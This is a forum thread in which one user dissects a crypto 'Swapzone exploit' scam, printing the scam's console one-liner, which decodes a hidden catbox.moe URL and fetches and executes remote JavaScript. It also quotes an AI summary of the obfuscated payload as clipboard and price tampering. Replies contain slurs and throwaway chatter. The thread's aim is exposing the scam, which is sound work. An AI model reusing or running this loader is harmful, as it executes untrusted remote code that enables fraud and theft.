Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   25828

Breaking Down the 'Swapzone Exploit' SCAM

by Jumpy22 - 09 August, 2025 - 04:52 AM
This post is by a banned member (HCZEE) - Unhide
HCZEE  
Premium Member
163
Posts
6
Threads
6 Years of service
#9
Who in the right mind would go on that site, clear scam, but sadly there are many ppl who fell for that im sure.
This post is by a banned member (xdaylar) - Unhide
xdaylar  
Registered
12
Posts
1
Threads
#10
(09 August, 2025 - 04:52 AM)Jumpy22 Wrote: Show More
Minutes ago I received this dm:
[Image: brave-hsm-GOFYIss.png]

I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:
Code:
(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):
Quote:The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:
[Image: retardgetsscammed.png]



Ok understandable
This post is by a banned member (BOSSMOROCCO) - Unhide
13
Posts
0
Threads
#11
gfthgfghfffg
This post is by a banned member (Mull1a7XPIRE) - Unhide
This post is by a banned member (vennie) - Unhide
vennie  
Registered
31
Posts
0
Threads
#13
tysm
This post is by a banned member (mainecapi) - Unhide
mainecapi  
Infinity
20
Posts
8
Threads
#14
Hi, is it still valid ?
This post is by a banned member (GhostKernel) - Unhide

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)